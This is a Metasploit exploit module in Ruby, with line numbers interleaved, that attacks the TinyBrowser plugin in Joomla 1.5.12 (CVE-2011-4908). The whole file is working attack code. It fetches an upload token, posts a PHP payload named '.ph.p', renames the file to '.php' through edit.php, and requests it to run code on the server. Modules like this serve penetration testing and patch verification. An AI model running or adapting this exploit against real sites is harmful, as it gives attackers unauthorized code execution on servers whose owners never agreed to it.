1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Joomla 1.5.12 TinyBrowser File Upload Code Execution',
16
        'Description' => %q{
17
          This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
18
          This plugin is not secured in version 1.5.12 of joomla and allows the upload
19
          of files on the remote server.
20
          By renaming the uploaded file this vulnerability can be used to upload/execute
21
          code on the affected system.
22
        },
23
        'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          ['CVE', '2011-4908'],
27
          ['OSVDB', '64578'],
28
          ['EDB', '9296'],
29
          ['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
30
        ],
31
        'Privileged' => false,
32
        'Payload' => {
33
          'DisableNops' => true,
34
          'Compat' =>
35
                        {
36
                          'ConnectionType' => 'find',
37
                        },
38
          'Space' => 1024,
39
        },
40
        'Platform' => 'php',
41
        'Arch' => ARCH_PHP,
42
        'Targets' => [[ 'Automatic', {}]],
43
        'DisclosureDate' => '2009-07-22',
44
        'DefaultTarget' => 0,
45
        'Notes' => {
46
          'Reliability' => UNKNOWN_RELIABILITY,
47
          'Stability' => UNKNOWN_STABILITY,
48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
        }
50
      )
51
    )
52

53
    register_options(
54
      [
55
        OptString.new('URI', [true, "Joomla directory path", "/"]),
56
      ]
57
    )
58
  end
59

60
  def check
61
    uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php')
62
    uri << '?type=file&folder='
63
    res = send_request_raw(
64
      {
65
        'uri' => uri
66
      }, 25
67
    )
68

69
    if (res and res.body =~ /flexupload.swf/)
70
      return Exploit::CheckCode::Appears
71
    end
72

73
    return Exploit::CheckCode::Safe
74
  end
75

76
  def retrieve_obfuscation()
77
  end
78

79
  def exploit
80
    cmd_php = '<?php ' + payload.encoded + '?>'
81

82
    # Generate some random strings
83
    cmdscript	= rand_text_alpha_lower(20)
84
    boundary = rand_text_alphanumeric(6)
85

86
    # Static files
87
    directory	= '/images/stories/'
88
    uri_base = normalize_uri(datastore['URI'])
89
    uri_base << '/' if uri_base[-1, 1] != '/'
90
    uri_base << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser'
91

92
    # Get obfuscation code (needed to upload files)
93
    obfuscation_code = nil
94

95
    res = send_request_raw({
96
      'uri' => uri_base + '/upload.php?type=file&folder='
97
    }, 25)
98

99
    if (res)
100

101
      if (res.body =~ /"obfus", "((\w)+)"\)/)
102
        obfuscation_code = $1
103
        print_good("Successfully retrieved obfuscation code: #{obfuscation_code}")
104
      else
105
        print_error("Error retrieving obfuscation code!")
106
        return
107
      end
108
    end
109

110
    # Upload shellcode (file ending .ph.p)
111
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
112
    data << "#{cmdscript}.ph.p\r\n--#{boundary}"
113
    data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
114
    data << "Content-Type: application/octet-stream\r\n\r\n"
115
    data << cmd_php
116
    data << "\r\n--#{boundary}--"
117

118
    res = send_request_raw({
119
      'uri'	=> uri_base + "/upload_file.php?folder=" + directory + "&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
120
      'method' => 'POST',
121
      'data' => data,
122
      'headers' =>
123
      {
124
        'Content-Length' => data.length,
125
        'Content-Type'	=> 'multipart/form-data; boundary=' + boundary,
126
      }
127
    }, 25)
128

129
    if (res and res.body =~ /File Upload Success/)
130
      print_good("Successfully Uploaded #{cmdscript}.ph.p")
131
    else
132
      print_error("Error uploading #{cmdscript}.ph.p")
133
    end
134

135
    # Complete the upload process (rename file)
136
    print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
137
    res = send_request_raw({
138
      'uri' => uri_base + '/upload_process.php?folder=' + directory + '&type=file&feid=&filetotal=1'
139
    })
140

141
    # Rename the file from .ph.p to .php
142
    res = send_request_cgi(
143
      {
144
        'method' => 'POST',
145
        'uri' => uri_base + '/edit.php?type=file&folder=',
146
        'vars_post' =>
147
        {
148
          'actionfile[0]' => "#{cmdscript}.ph.p",
149
          'renameext[0]' => 'p',
150
          'renamefile[0]' => "#{cmdscript}.ph",
151
          'sortby' => 'name',
152
          'sorttype' => 'asc',
153
          'showpage' => '0',
154
          'action' => 'rename',
155
          'commit' => '',
156
        }
157
      }, 10
158
    )
159

160
    if (res and res.body =~ /successfully renamed./)
161
      print_status("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
162
    else
163
      print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
164
    end
165

166
    # Finally call the payload
167
    print_status("Calling payload: #{cmdscript}.php")
168
    uri = normalize_uri(datastore['URI'])
169
    uri << '/' if uri[-1, 1] != '/'
170
    uri << directory + cmdscript + ".php"
171
    res = send_request_raw({
172
      'uri'	=> uri
173
    }, 25)
174
  end
175
end
176

177